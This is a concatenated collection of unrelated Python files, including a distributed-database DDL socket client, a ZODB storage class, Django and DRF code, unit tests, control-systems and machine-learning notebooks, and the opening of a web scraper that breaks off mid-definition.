fig.add_trace(go.Scatter3d(x=x, y=z, z=y, name='trajectory 1', mode='lines+markers',line={'width':4,'color':'green'},marker={'size':4,'color':'green'}))
fig.add_trace(go.Scatter3d(x=x1, y=z1, z=y1,name='trajectory 2', mode='lines+markers',line={'width':4,'color':'red'}, marker={'size':4,'color':'red'}))
fig.add_trace(go.Scatter3d(x=[x_rand[0]], y=[x_rand[2]], z=[x_rand[1]], mode='markers',name = 'goal 1', marker={'size':6,'color':'green'}))
fig.add_trace(go.Scatter3d(x=[x_rand1[0]], y=[x_rand1[2]], z=[x_rand1[1]],mode='markers',name = 'goal 2', marker={'size':6,'color':'red'}))
fig.update_layout(
    scene={
        'xaxis_title':'x',
        'yaxis_title' : 'θ',
        'zaxis_title' : 'y',
        'aspectmode': 'cube'
    })
#fig.write_html("./forward_integration.html")
fig.show()
|
import sys
import sqlite3
from sqlite3 import Error
import time
import threading
from urllib.parse import urlparse
import socket
from socket import error as socket_error
"""
function: init()
parameter: None
return: none
This function will get the value for clustercfg and ddlfile
then declare them as global values
"""
def init():
    """Read the cluster-config and DDL file paths from argv into globals."""
    global clustercfg, ddlfile
    clustercfg, ddlfile = sys.argv[1], sys.argv[2]
"""
function: do_connect()
parameter: (hash) cp, (string) ddlfile
return: none
This function receive the information about the cluster pc, and ddlfile name
Then it will connect to the server PC(s) and send the config + query
for the server to process. It will print out success, if the query is
successful executed, otherwise it will print out failed.
"""
def do_connect(cp, ddlfile):
    """Send a DDL job to one node server and print its response.

    cp is a dict with 'host', 'port' and 'db' keys (see parseUrl). The
    exchange is: announce the client type "node", send the node's config
    string "host:port/db", send the DDL file name, then print whatever the
    server returns (expected to be a success/failure message). Socket
    errors are caught and printed rather than raised.
    """
    mySocket = socket.socket()
    try:
        mySocket.connect((cp['host'], int(cp['port']) ))
        # pc type
        data_pc_type = "node"
        mySocket.send(data_pc_type.encode())
        # listen from server (handshake acknowledgement)
        data = mySocket.recv(1024).decode()
        # send pc_config data
        data = cp['host'] + ':' + cp['port'] + '/' + cp['db']
        mySocket.send(data.encode())
        # receive signal from server
        data = mySocket.recv(1024).decode()
        # send ddlfile name to server
        mySocket.send(ddlfile.encode())
        # receive output from server
        data = mySocket.recv(1024).decode()
        print (data)
        mySocket.close()
    except socket_error as e:
        # Best-effort: report the connection failure and keep going.
        print (e)
"""
function: update_catalog_client()
parameter: (hash) cfg, (string) ddlfile
return: none
This function receive the information about the cluster pc, and ddlfile name
Then it will connect to the catalog server PC(s) and send the config + query
for the server to process. It will print out success, if the query is
successful executed, otherwise it will print out failed.
"""
def update_catalog_client(cfg, cfg_data):
    """Send the cluster config to the catalog server so it can update
    its catalog tables.

    cfg is the parsed cluster config (needs key 'catalog.hostname');
    cfg_data is the cluster-config file path sent to the server. The
    exchange mirrors do_connect but announces client type "catalog".
    Socket errors are caught and printed rather than raised.
    """
    # get catalog hostname from cfg string using
    # parseUrl (e.g catalog.hostname=172.17.0.2:50001/mycatdb)
    cat_cp = parseUrl(cfg['catalog.hostname'])
    mySocket = socket.socket()
    try:
        mySocket.connect((cat_cp['host'], int(cat_cp['port'])))
        # pc type
        data_pc_type = "catalog"
        mySocket.send(data_pc_type.encode())
        # listen from server (handshake acknowledgement)
        data_temp = mySocket.recv(1024).decode()
        # send pc_config data
        data_cp = cat_cp['host'] + ':' + cat_cp['port'] + '/' + cat_cp['db']
        mySocket.send(data_cp.encode())
        data_temp = mySocket.recv(1024).decode()
        # send cfgFile to server
        mySocket.send(cfg_data.encode())
        data_temp = mySocket.recv(1024).decode()
        print (data_temp)
        mySocket.close()
    except socket_error as e:
        # Best-effort: report the connection failure and keep going.
        print (e)
"""
function: parseUrl()
parameter: (string) hostname
return: (hash) node
This function receives hostname from clustercfg file as a string. Then it will
parse the string into host, port, and databse name that will contains in a node
that will be returned.
"""
def parseUrl(hostname):
    """Split a 'host:port/db' string into a dict.

    urlparse treats the host as the URL scheme (so it is lowercased) and
    leaves 'port/db' in the path, which is then split on '/'.

    Returns a dict with keys 'host', 'port' and 'db' (all strings).
    """
    parsed = urlparse(hostname)
    parts = parsed.path.split('/')
    return {'host': parsed.scheme, 'port': parts[0], 'db': parts[1]}
"""
function: parse_config()
parameter: (string) filename
return: hash (options)
This function receive the filename of the clustercfg file.
Then it will parse and store the information into a hash.
Users can retrieve the information by calling the variable
from the cfgfile
"""
def parse_config(filename):
    """Parse a simple 'option=value' config file into a dict.

    Anything after a '#' on a line is discarded as a comment; lines
    without '=' are ignored; option names and values are stripped of
    surrounding whitespace.

    Args:
        filename: path of the cluster config file.

    Returns:
        dict mapping option names to their string values.
    """
    COMMENT_CHAR = '#'
    OPTION_CHAR = '='
    options = {}
    # FIX: use a context manager so the file is closed even if parsing
    # raises (the original left the handle open on an exception).
    with open(filename) as f:
        for line in f:
            # First, remove comments: keep only the part before '#'.
            if COMMENT_CHAR in line:
                line, _ = line.split(COMMENT_CHAR, 1)
            # Second, keep lines with an option=value pair.
            if OPTION_CHAR in line:
                option, value = line.split(OPTION_CHAR, 1)
                options[option.strip()] = value.strip()
    return options
"""
function: main()
parameter: none
return: none
Main function of the program
"""
def main():
    """Entry point: send the DDL file to every node, then tell the
    catalog server to record the cluster config.

    Expects two CLI arguments: the cluster config file and the DDL file.
    """
    if len(sys.argv) < 3:
        print("Error: You didn't enter enough arguments!")
        print("Usage: python3 runDDL.py ./cfgfile ./ddlfile")
        sys.exit()
    else:
        init()
        cfg = parse_config(clustercfg)
        # get numnodes
        numnodes = int(cfg['numnodes'])
        # loop through all the nodes
        for node in range(1, numnodes + 1):
            cp = parseUrl(cfg['node%d.hostname' % node])
            # BUG FIX: the original passed target=do_connect(cp, ddlfile),
            # which CALLS do_connect immediately and hands its return value
            # (None) to Thread. Pass the callable and its args instead.
            # NOTE: start() immediately followed by join() keeps the
            # original sequential per-node behavior.
            t = threading.Thread(target=do_connect, args=(cp, ddlfile))
            t.start()
            t.join()
        # update catalog table
        update_catalog_client(cfg, clustercfg)
if __name__ == '__main__':
    main()
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Very Simple dbm-based ZODB storage
This storage provides for use of dbm files as storages that
don't support versions or Undo. This may be useful when implementing
objects like hit counters that don't need or want to participate
in undo or versions.
"""
__version__='$Revision: 1.4 $'[11:-2]
import base64, POSException, time, string, utils
from MappingStorage import MappingStorage
from BaseStorage import BaseStorage
import anydbm, os
class anydbmStorage(MappingStorage):
    """ZODB storage backed by an anydbm file (Python 2 era).

    Supports neither versions nor undo; useful for objects like hit
    counters that don't want either (see the module docstring).
    """

    def __init__(self, filename, flag='r', mode=0666):
        # NOTE: deliberately calls BaseStorage.__init__, not
        # MappingStorage.__init__, so the dbm file itself (not an
        # in-memory dict) acts as the index.
        BaseStorage.__init__(self, filename)
        self._index=anydbm.open(filename, flag, mode)
        self._tindex=[]
        keys=self._index.keys()
        # The largest stored oid seeds new-oid allocation.
        if keys: self._oid=max(keys)

    def getSize(self):
        # This is a little iffy, since we aren't entirely sure what the file is
        self._lock_acquire()
        try:
            try:
                # Some dbm variants store data in a '.data'/'.dir' pair.
                return (os.stat(self.__name__+'.data')[6] +
                        os.stat(self.__name__+'.dir')[6]
                        )
            except:
                # Fall back to a single file, then to 0 if that fails too.
                try: return os.stat(self.__name__)[6]
                except: return 0
        finally: self._lock_release()
class gdbmStorage(anydbmStorage):
    """anydbmStorage specialization for gdbm files.

    gdbm stores everything in one file and supports reorganize(), which
    makes pack() able to reclaim space.
    """

    def __init__(self, filename, flag='r', mode=0666):
        BaseStorage.__init__(self, filename)
        import gdbm
        # 'f' (fast) mode defers syncs; explicit index.sync() calls below.
        self._index=index=gdbm.open(filename, flag[:1]+'f', mode)
        self._tindex=[]
        # Find the largest stored oid by walking gdbm's key sequence
        # (starting from the 8-zero-byte root oid).
        m='\0\0\0\0\0\0\0\0'
        oid=index.firstkey()
        while oid != None:
            m=max(m, oid)
            oid=index.nextkey(oid)
        self._oid=m

    def getSize(self):
        # gdbm keeps a single file, so one stat suffices.
        self._lock_acquire()
        try: return os.stat(self.__name__)[6]
        finally: self._lock_release()

    def pack(self, t, referencesf):
        """Garbage-collect records unreachable from the root object."""
        self._lock_acquire()
        try:
            # Build an index of *only* those objects reachable
            # from the root.
            index=self._index
            rootl=['\0\0\0\0\0\0\0\0']
            pop=rootl.pop
            pindex={}
            referenced=pindex.has_key
            while rootl:
                oid=pop()
                if referenced(oid): continue
                # Scan non-version pickle for references
                r=index[oid]
                pindex[oid]=r
                # Skip the 8-byte serial prefix; the rest is the pickle.
                p=r[8:]
                referencesf(p, rootl)
            # Now delete any unreferenced entries:
            deleted=[]
            oid=index.firstkey()
            while oid != None:
                if not referenced(oid): deleted.append(oid)
                oid=index.nextkey(oid)
            pindex=referenced=None
            for oid in deleted: del index[oid]
            index.sync()
            # Reclaim the file space freed by the deletions.
            index.reorganize()
        finally: self._lock_release()

    def _finish(self, tid, user, desc, ext):
        # Flush the per-transaction buffer into the gdbm file at commit.
        index=self._index
        for oid, p in self._tindex: index[oid]=p
        index.sync()
|
# Generated by Django 2.0.13 on 2019-10-15 08:09
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the 'Components' field to lowercase 'components' on both the
    issuetracker and mastercomponents models (naming-convention cleanup)."""

    dependencies = [
        ('cc', '0006_authentication'),
    ]

    operations = [
        migrations.RenameField(
            model_name='issuetracker',
            old_name='Components',
            new_name='components',
        ),
        migrations.RenameField(
            model_name='mastercomponents',
            old_name='Components',
            new_name='components',
        ),
    ]
|
from typing import List
class Solution:
    """LeetCode 56 — merge overlapping intervals."""

    def merge(self, intervals: List[List[int]]) -> List[List[int]]:
        """Merge all overlapping intervals.

        Args:
            intervals: list of [start, end] pairs.

        Returns:
            A list of non-overlapping intervals sorted by start, covering
            exactly the same points as the input. Sorts *intervals* in place.
        """
        # Guard: the original indexed intervals[0] and raised IndexError
        # on an empty input.
        if not intervals:
            return []
        intervals.sort(key=lambda x: (x[0], x[1]))
        res = [intervals[0]]
        for i in range(1, len(intervals)):
            if intervals[i][0] <= res[-1][1]:
                # Overlaps (or touches) the last merged interval: extend it.
                res[-1][1] = max(res[-1][1], intervals[i][1])
            else:
                res.append(intervals[i])
        return res
from unittest import TestCase
from BribeNet.bribery.temporal.action.multiBriberyAction import MultiBriberyAction, \
BriberyActionsAtDifferentTimesException, BriberyActionsOnDifferentGraphsException, \
NoActionsToFormMultiActionException
from BribeNet.bribery.temporal.action import *
from BribeNet.bribery.temporal.action.singleBriberyAction import SingleBriberyAction
from BribeNet.bribery.temporal.nonBriber import NonBriber
from BribeNet.graph.temporal.noCustomerActionGraph import NoCustomerActionGraph
from unittest.mock import MagicMock
# noinspection PyBroadException
class TestMultiBriberyAction(TestCase):
    """Unit tests for MultiBriberyAction: bribe validation, budget
    enforcement, and construction from lists of SingleBriberyAction."""

    def setUp(self) -> None:
        # Four bribers share one graph; the action dict maps
        # briber id -> {node id -> bribe amount}.
        self.bribers = (NonBriber(1), NonBriber(1), NonBriber(1), NonBriber(1))
        self.valid_action_dict = {0: {0: 0.5}, 2: {0: 0.5}, 3: {0: 0.5}}
        self.graph = NoCustomerActionGraph(self.bribers)

    def tearDown(self) -> None:
        del self.bribers, self.graph

    def test_add_bribe_fails_if_bribe_not_greater_than_zero(self):
        action = MultiBriberyAction(self.graph)
        self.assertRaises(BribeMustBeGreaterThanZeroException, action.add_bribe, 0, 0, -1.0)

    def test_add_bribe_fails_if_node_id_not_present(self):
        action = MultiBriberyAction(self.graph)
        self.assertRaises(NodeDoesNotExistException, action.add_bribe, 0, -1, 1.0)

    def test_add_bribe_fails_if_briber_id_not_present_1(self):
        # Briber id below the valid range.
        action = MultiBriberyAction(self.graph)
        self.assertRaises(BriberDoesNotExistException, action.add_bribe, -1, 0, 1.0)

    def test_add_bribe_fails_if_briber_id_not_present_2(self):
        # Briber id just past the last valid index (only 4 bribers: 0..3).
        action = MultiBriberyAction(self.graph)
        self.assertRaises(BriberDoesNotExistException, action.add_bribe, 4, 0, 1.0)

    def test_add_bribe_passes_1(self):
        action = MultiBriberyAction(self.graph)
        action.add_bribe(0, 0, 1.0)
        self.assertEqual(action._bribes[0][0], 1.0)

    def test_add_bribe_passes_2(self):
        # Adding to an existing bribe accumulates rather than replaces.
        action = MultiBriberyAction(self.graph, bribes={0: {0: 1.0}})
        action.add_bribe(0, 0, 1.0)
        self.assertEqual(action._bribes[0][0], 2.0)

    def test_perform_action_fails_when_bribes_exceed_budget(self):
        # Each NonBriber starts with utility 1, so a 10.0 bribe exceeds it.
        action = MultiBriberyAction(self.graph, bribes={0: {0: 10.0}})
        self.assertRaises(BriberyActionExceedsAvailableUtilityException, action.perform_action)

    def test_perform_action(self):
        action = MultiBriberyAction(self.graph, bribes=self.valid_action_dict)
        action.perform_action()
        self.assertTrue(action.get_performed())

    def test_make_multi_action_from_single_actions_fails_if_on_different_graphs(self):
        other_briber = NonBriber(1)
        # noinspection PyUnusedLocal
        other_graph = NoCustomerActionGraph(other_briber)
        action0 = SingleBriberyAction(other_briber)
        action1 = SingleBriberyAction(self.bribers[0])
        self.assertRaises(BriberyActionsOnDifferentGraphsException,
                          MultiBriberyAction.make_multi_action_from_single_actions, [action0, action1])

    def test_make_multi_action_from_single_actions_fails_if_no_actions(self):
        self.assertRaises(NoActionsToFormMultiActionException,
                          MultiBriberyAction.make_multi_action_from_single_actions, [])

    def test_make_multi_action_from_single_actions_fails_if_bribe_not_greater_than_zero(self):
        action = SingleBriberyAction(self.bribers[0])
        # Inject an invalid negative bribe directly into the internals.
        action._bribes[0] = -1.0
        self.assertRaises(BribeMustBeGreaterThanZeroException,
                          MultiBriberyAction.make_multi_action_from_single_actions, [action])

    def test_make_multi_action_from_single_actions_fails_if_at_different_times(self):
        action0 = SingleBriberyAction(self.bribers[0])
        action1 = SingleBriberyAction(self.bribers[1])
        # Mock one action to report a later time step than the other.
        action0.get_time_step = MagicMock(return_value=action0.get_time_step()+1)
        self.assertRaises(BriberyActionsAtDifferentTimesException,
                          MultiBriberyAction.make_multi_action_from_single_actions, [action0, action1])

    def test_make_multi_action_from_single_actions(self):
        single_actions = [SingleBriberyAction(self.bribers[i], self.valid_action_dict[i])
                          for i in self.valid_action_dict.keys()]
        multi_action = MultiBriberyAction.make_multi_action_from_single_actions(single_actions)
        self.assertEqual(multi_action._bribes, self.valid_action_dict)
|
import torch

# Dataset parameters.
batch_size = 128

# Word-to-sequence parameters.
min_word_count = 5        # minimum word frequency kept in the vocabulary
max_word_count = None     # maximum word frequency kept in the vocabulary
max_features = None       # vocabulary size cap, excluding the UNK/PAD tokens
max_sentence_len = 20     # maximum sentence length in tokens
embedding_dim = 100       # dimension of each word embedding

# LSTM network parameters.
hidden_size = 64
num_layer = 2
bidirectional = True
num_direc = 2 if bidirectional else 1  # direction count follows bidirectionality
dropout = 0.5

# GPU training parameter: prefer CUDA when available.
device = torch.device('cuda' if torch.cuda.is_available() else "cpu")
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from control import *
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import *
from scipy.signal import cont2discrete, lti, dlti, dstep
# In[2]:
# reference signal: one period-ish sine over 50 samples, forced to end at 0
t = np.linspace(0, 1, 50)
yd = 9*np.sin(3.1*t) ; yd[49] = 0
plt.xlabel('Waktu (s)')
plt.ylabel('Posisi sendi (derajat)')
plt.plot(t,yd,'-')
# In[3]:
# example transfer functions for three robot joints (J1..J3)
numj1 = np.array([0, 0.2622, 1624])
denj1 = np.array([1, 39.42, 1761])
numj2 = np.array([0, 0.2101, 1312])
denj2 = np.array([1, 35.15, 1374])
numj3 = np.array([0, 0.6385, 1285])
denj3 = np.array([1, 35.74, 1380])
# Convert each transfer function to a continuous state-space model.
Aj1,Bj1,Cj1,Dj1 = tf2ss(numj1,denj1)
Aj2,Bj2,Cj2,Dj2 = tf2ss(numj2,denj2)
Aj3,Bj3,Cj3,Dj3 = tf2ss(numj3,denj3)
# In[4]:
#tf2zpk(num,den)
# In[5]:
# Discretize with the bilinear (Tustin) transform at the sample period dt.
dt = 1/len(t)
Adj1,Bdj1,Cdj1,Ddj1,_ = cont2discrete((Aj1, Bj1, Cj1, Dj1), dt, method='bilinear')
Adj2,Bdj2,Cdj2,Ddj2,_ = cont2discrete((Aj2, Bj2, Cj2, Dj2), dt, method='bilinear')
Adj3,Bdj3,Cdj3,Ddj3,_ = cont2discrete((Aj3, Bj3, Cj3, Dj3), dt, method='bilinear')
# In[6]:
# Back to transfer-function form (numerator/denominator of the discrete TFs).
zj1,pj1 = ss2tf(Adj1,Bdj1,Cdj1,Ddj1)
zj2,pj2 = ss2tf(Adj2,Bdj2,Cdj2,Ddj2)
zj3,pj3 = ss2tf(Adj3,Bdj3,Cdj3,Ddj3)
# In[7]:
#from plot_zplane import zplane
#fig, axs = plt.subplots(3, 1,figsize=(30,25),squeeze=False)
#zplane(zj1[0],pj1,'plotj1.png',title='Plot Z-plane J1')
#zplane(zj2[0],pj2,'plotj2.png',title='Plot Z-plane J2')
#zplane(zj3[0],pj3,'plotj3.png',title='Plot Z-plane J3')
# In[150]:
# markov parameters H for minimum phase
#np.set_printoptions(threshold=np.inf)
from numpy.linalg import matrix_power
from numpy.linalg import multi_dot
# Build the lower-triangular NxN Markov-parameter matrix of joint J3:
# H[i][j] = C * A^(i-j) * B for i >= j, and C*B on the diagonal.
H = np.zeros(shape=(len(t),len(t)))
for i in range(len(t)):
    for j in range(len(t)):
        if i == j :
            H[i][j] = np.dot(Cdj3,Bdj3)
        # NOTE(review): this inner scan is O(N) per entry just to find
        # k == i - j; computing k directly would drop a factor of N.
        for k in range(len(t)):
            if i - j == k:
                H[i][j] = multi_dot([Cdj3,matrix_power(Adj3, k),Bdj3])
print(H)
# In[194]:
#derivative gain
def d_error(e, t=None, dt=0.3):
    """Numerically differentiate the error signal *e*.

    Uses a forward difference at the first sample, a backward difference
    at the last sample, and central differences in between.

    Args:
        e: sequence of error values (indexable, length >= 2).
        t: number of samples to differentiate; defaults to len(e).
           (The original default was len(t) of a notebook global, bound
           at definition time — len(e) is the call-time equivalent.)
        dt: sample spacing.

    Returns:
        numpy array of length t with the approximated derivative.
    """
    if t is None:
        t = len(e)
    de = np.zeros(t)
    for i in range(t):
        if i == 0:
            # Forward difference at the left boundary.
            # BUG FIX: the original tested `i == 1`, so de[0] fell through
            # to the central branch and read e[-1] via wrap-around
            # indexing, while de[1] got a forward instead of a central
            # difference.
            de[i] = (e[i + 1] - e[i]) / (dt)
        elif i == t - 1:
            # Backward difference at the right boundary.
            de[i] = (e[i] - e[i - 1]) / (dt)
        else:
            # Central difference in the interior.
            de[i] = (e[i + 1] - e[i - 1]) / (2 * dt)
    return de
# In[195]:
# Iterative Learning Control (ILC) simulation: starting from zero input,
# repeatedly apply a PD-type learning update until 15 iterations elapse.
plt.plot(t,yd,'o')
# first test signal
Kp = np.zeros(shape=(len(t),len(t))) # NxN proportional-gain matrix
np.fill_diagonal(Kp, 0.5)
Kd = np.zeros(shape=(len(t),len(t))) # NxN derivative-gain matrix
np.fill_diagonal(Kd, 0.3)
# new input uk
u0 = np.zeros(shape=(len(t),1)) # Nx1 input vector
# error reference
error = []
iterasi = 1
iter_save = []
yk_save = []
while True :
    # Output of the lifted system for the current input.
    Yk = np.dot(H,u0)
    # Tracking error against the reference; first sample forced to 0.
    e0 = yd - np.transpose(Yk)[0] ; e0[0] = 0
    e0 = np.reshape(e0,(len(t),1))
    # Root-mean-square error of this iteration.
    errval = np.sqrt(np.sum(e0**2)/(len(e0)))
    error.append(errval)
    #try:
    #u0 = u0 + np.dot(Lp[iterasi-1],e0) #+ np.dot(Kd,d_error(e0).reshape((len(t),1)))
    #except IndexError :
    #u0 = u0 + np.dot(np.zeros(shape=(len(t),len(t))),e0)
    # PD-type ILC update law: u_{k+1} = u_k + Kp*e_k + Kd*de_k.
    u0 = u0 + np.dot(Kp,e0) + np.dot(Kd,d_error(e0).reshape((len(t),1)))
    #u0 = np.dot(Q, (u0 + np.dot(Kp,e0)))
    yk_save.append(Yk)
    iter_save.append(iterasi)
    iterasi = iterasi + 1
    plt.plot(t,Yk)
    #if errval < 1e-2 : break
    if iterasi > 15 : break
    # Print the RMSE each iteration to monitor convergence.
    print(errval)
# In[182]:
# RMSE versus iteration number.
plt.plot(iter_save, error,'--')
#plt.title('Root Mean Square Error untuk Kp = 0.1')
plt.xlabel('Iteration')
plt.ylabel('RMSE')
# In[184]:
# Desired trajectory against snapshots of selected iterations.
plt.plot(t,yd,'ok',label='Desired trajectory')
plt.plot(t,yk_save[1],'-r',label='1st Iteration')
plt.plot(t,yk_save[5],'-g',label='5th Iteration')
plt.plot(t,yk_save[10],'-b',label='10th Iteration')
#plt.plot(t,yk_save[50],'-y',label='50th Iteration')
plt.title('Hasil Simulasi J3 dengan nilai Kd=0.2')
plt.xlabel('Waktu (s)')
plt.ylabel('Posisi sendi (derajat)')
plt.legend(loc = 'upper right',fontsize='7.4')
#plt.savefig('third_simulation_kp_0.5.png')
#plt.savefig('first_simulation.png')
#plt.savefig('second_simulation.png')
# In[196]:
# Convergence check: the ILC error iteration is e_{k+1} = (I - (Kp+Kd) H) e_k,
# which converges when the spectral radius of the iteration matrix is < 1.
Kp = np.zeros(shape=(len(t), len(t)))  # NxN proportional-gain matrix
np.fill_diagonal(Kp, 0.5)
Kd = np.zeros(shape=(len(t), len(t)))  # NxN derivative-gain matrix
np.fill_diagonal(Kd, 0.2)
#np.dot((Kp+Kd),H)
spectral = np.identity(len(t)) - np.dot((Kp + Kd), H)
eig, _ = np.linalg.eig(spectral)
# BUG FIX: eigenvalues of a general matrix may be complex; np.max(eig) compared
# raw values instead of magnitudes. The spectral radius is max |lambda|.
print(np.max(np.abs(eig)))
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 3 14:35:53 2019
@author: Antonin
"""
import numpy as np
import matplotlib.pyplot as plt
import pickle as pkl
import seaborn as sns
sns.set(style="ticks")
# Results directory of one continual-learning run (MNIST, manual rates).
# NOTE(review): absolute Windows path -- parameterize before reuse.
path="C:/Users/Antonin/Documents/Documents/ENS 2A/Stage M1/Results/2019-07-15/ManualRates/MNIST/length10000000_batches10/T0.010 Memory0 block1 1563285405.516"
# Accuracy traces for the original (temporally correlated) and shuffled runs.
original_classes=np.load(path+"/var_original_accuracy.npy",
                         allow_pickle=True)
shuffle_classes=np.load(path+"/var_shuffle_accuracy.npy",
                        allow_pickle=True)
# Label sequences actually presented during training.
original = pkl.load(open(path+"/original", 'rb'))
shuffle = pkl.load(open(path+"/shuffle", 'rb'))
# Per-class prediction counts at several checkpoints.
original_class_prediction = np.load(path+'/var_original_classes_prediction.npy', allow_pickle=True)
shuffle_class_prediction = np.load(path+'/var_shuffle_classes_prediction.npy', allow_pickle=True)
# Label-vs-time plot for the original sequence, with markers at 200k/300k/400k.
fig, ax = plt.subplots(figsize=(9,9))
plt.plot(original)
plt.xlabel("Number of training examples", fontsize=22)
plt.ylabel("Label", fontsize=22)
plt.axvline(200000, ls='--', c='r')
plt.axvline(300000, ls='--', c='r')
plt.axvline(400000, ls='--', c='r')
# Same plot for the shuffled sequence.
plt.figure()
plt.plot(shuffle)
plt.xlabel("Number of training examples", fontsize=22)
plt.ylabel("Label", fontsize=22)
ax.tick_params(labelsize=22)
# Grouped bar charts: predicted-class histograms, original vs shuffle,
# for the first six checkpoints.
x = np.arange(0,10)
for i in range(0,6,1):
    fig, ax = plt.subplots(figsize=(9,9))
    barwidth=0.35
    plt.bar(x-barwidth/2,original_class_prediction[i,0], width=barwidth, tick_label=[0,1,2,3,4,5,6,7,8,9])
    plt.bar(x+barwidth/2,shuffle_class_prediction[i,0], width=barwidth)
    plt.legend(['Original', 'Shuffle'], fontsize=22)
    plt.xlabel("Class predicted", fontsize=22)
    ax.tick_params(labelsize=22)
# Extract the plain label sequences from the (input, label) training pairs.
train_data = pkl.load(open(path+'/train_data', 'rb'))
data_shuffe = pkl.load(open(path+'/data_shuffle', 'rb'))
seq_control_shuffle=[]
for k in data_shuffe:
    seq_control_shuffle.append(k[1].item())
seq_control_original=[]
for k in train_data:
    seq_control_original.append(k[1].item())
#
#seq_control_block=[]
#for k in shuffledblock:
# seq_control_block.append(k[1].item())
#
#
#
#
#
#
|
from django.conf import settings
from django.utils import timezone
from api.user.constants import USER_ACTIVITY_EVENT_TYPES
from api.user.models import UserActvitiyLog
class UserActivityLogMiddleware(object):
    """Record start/end-of-day activity events for authenticated users.

    On a user's first request of a new day (in settings.LOCAL_TIME_ZONE),
    writes an END_DAY_ACTIVITY row stamped with the previous last_activity
    and a START_DAY_ACTIVITY row stamped with now, then updates
    profile.last_activity.
    """

    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        # BUG FIX: this is plain-object (non-MiddlewareMixin) middleware, so
        # Django only invokes __call__; process_request was defined but never
        # executed, making the whole logging path dead code.
        self.process_request(request)
        return self.get_response(request)

    def process_request(self, request):
        # NOTE(review): is_authenticated is a property since Django 1.10 and
        # no longer callable from Django 3.0 -- confirm the project's version.
        if request.user.is_authenticated():
            user = request.user
            local_timezone = settings.LOCAL_TIME_ZONE
            # Midnight of "today" in the configured local timezone.
            start_of_day = (
                timezone.now()
                .astimezone(local_timezone)
                .replace(hour=0, minute=0, second=0, microsecond=0)
            )
            last_activity = user.profile.last_activity
            if (last_activity) and (last_activity < start_of_day):
                # First request of a new day: close out the previous day...
                UserActvitiyLog.objects.create(
                    user=request.user,
                    event_type=USER_ACTIVITY_EVENT_TYPES.END_DAY_ACTIVITY,
                    event_description="End of day activity",
                    event_time=last_activity,
                )
                # ...and open the new one.
                new_last_activity = timezone.now()
                UserActvitiyLog.objects.create(
                    user=request.user,
                    event_type=USER_ACTIVITY_EVENT_TYPES.START_DAY_ACTIVITY,
                    event_description="Start day activity",
                    event_time=new_last_activity,
                )
                profile = user.profile
                profile.last_activity = new_last_activity
                profile.save()
        return None
|
# -*- coding:utf-8 -*-
from . import FlaskConfig
class DevelopmentConfig(FlaskConfig):
    """Configuration for development mode."""
    # Echo the raw SQL of every query for debugging.
    SQLALCHEMY_ECHO = True
    ENV = 'development'
|
# -*- coding:utf8 -*-
"""
Created on 16/9/26 上午11:46
@author: fmc
"""
from __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function
import logging
from rest_framework import serializers
from ..models.cluster import ClusterModel, ClusterTemplateModel, ClusterTemplateVersionModel
from ..models.swimlane import SwimlaneModel
from ..models.host import HostModel, HostModelModel
from ..models.product import AppIdModel
from omni.libs.django_rest_framework.relations import FullObjectPrimaryKeyRelatedField
from omni.libs.django_rest_framework.serializers import CommonExtModelSerializer
log = logging.getLogger(__name__)
class ClusterModelSerializer(CommonExtModelSerializer):
    """DRF serializer for ClusterModel; related objects are rendered one
    level deep via FullObjectPrimaryKeyRelatedField."""
    serializer_related_field = FullObjectPrimaryKeyRelatedField

    class Meta:
        model = ClusterModel
        depth = 1
class ClusterTemplateModeSerializer(CommonExtModelSerializer):
    """DRF serializer for ClusterTemplateModel; related objects are rendered
    one level deep via FullObjectPrimaryKeyRelatedField."""
    serializer_related_field = FullObjectPrimaryKeyRelatedField

    class Meta:
        model = ClusterTemplateModel
        depth = 1
class ClusterTemplateVersionModeSerializer(CommonExtModelSerializer):
    """DRF serializer for ClusterTemplateVersionModel.

    update() additionally syncs the host_model foreign key and the app_id
    many-to-many set from the raw request payload; create() is unsupported.
    """
    serializer_related_field = FullObjectPrimaryKeyRelatedField

    class Meta:
        model = ClusterTemplateVersionModel
        depth = 1

    def update(self, instance, validated_data):
        # Re-point the host_model FK only when the submitted id differs.
        host_model_id = self.validate_foreign_key_field(self.initial_data.get('host_model'))
        if host_model_id and not host_model_id == instance.host_model_id:
            instance.host_model = HostModelModel.objects.get(pk=host_model_id)
        instance = super(ClusterTemplateVersionModeSerializer, self).update(instance, validated_data)
        # Replace the app_id m2m set only when the submitted ids differ from
        # the (sorted) current ones.
        app_id_list = self.validate_many_to_many_field(self.initial_data.getlist('app_id'))
        instance_appid_id_list = sorted(appid_obj.id for appid_obj in instance.app_id.all())
        if app_id_list and not app_id_list == instance_appid_id_list:
            # BUG FIX: app_id ids are collected from AppIdModel instances above,
            # but the original filtered ClusterTemplateVersionModel here,
            # assigning objects of the wrong type. (Debug log.error('xxxx...')
            # leftovers removed as well.)
            instance.app_id = AppIdModel.objects.filter(pk__in=app_id_list)
        return instance

    def create(self, validated_data):
        # Creation is deliberately unsupported through this serializer.
        pass
|
from dateutil.parser import parse
from datetime import datetime
import pandas as pd
import numpy as np
import hashlib
import time
import datetime
from datetime import date, timedelta
import requests, re, json
import bs4
from bs4 import BeautifulSoup
import pymongo
from pymongo import MongoClient
from apscheduler.schedulers.blocking import BlockingScheduler
# Blocking scheduler: sched.start() at the bottom of the file never returns.
sched = BlockingScheduler()
def getLocationCode(location):
    """Map a Hong Kong district name to its numeric station code.

    Whitespace is stripped and the name case-folded before lookup;
    unknown districts map to 17.
    """
    codes = {
        'causewaybay': 0, 'central': 1, 'central/western': 2, 'eastern': 3,
        'kwaichung': 4, 'kwuntong': 5, 'mongkok': 6, 'shamshuipo': 7,
